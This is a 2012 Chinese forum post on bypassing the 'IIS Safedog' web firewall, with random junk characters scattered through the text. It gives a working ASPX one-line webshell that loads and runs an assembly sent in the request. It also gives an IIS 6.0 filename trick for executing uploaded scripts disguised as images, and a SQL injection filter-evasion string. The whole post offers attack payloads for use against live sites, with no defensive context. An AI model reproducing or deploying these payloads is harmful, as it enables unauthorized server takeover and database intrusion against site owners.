1、绕过IIS安全狗的一句话。
( }" H. i. K' H% n. x3 t- ?9 ^$ P前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
4 `- p* E4 d$ f1 U/ ~2 E8 V( \<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。& Z) R' t" G0 `
( J0 d; l5 U5 X8 C
2、IIS6.0解析漏洞遇到安全狗。5 a, a, Z; J4 l3 \* E+ k) q
文件名为
: T) O+ H# i+ ihttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
9 [1 l$ t5 t9 E o2 _" Y# `/ _
这样的会被IIS安全狗果断屏蔽。( v" f6 q' P/ C' l) {' n% I: m
改成如下名称,IIS6一样会解析:+ U+ _( g4 k- H: {% F O; o) }
www.xxxxx.com/;1.asp;1.jpg
j' L1 e: D8 e# { N0 H! n6 ^# o, r4 H* A
3、安全狗的注入绕过。4 ?7 Q% `. B' a% L( j1 \
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。4 V* }) l# b* O- U: W! ?
但如果:# K8 H% `( k3 n
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=18 V1 y( }; ]$ S- _+ X
就可以成功绕过了。
! F9 R1 ^# ?* h% T7 C
3 w1 F* c6 Q: L+ k4 i/ H5 c5 p4 Z% u. ^ a8 b" O9 }
|
发表于 2012-10-31 08:25:30
收藏
支持
反对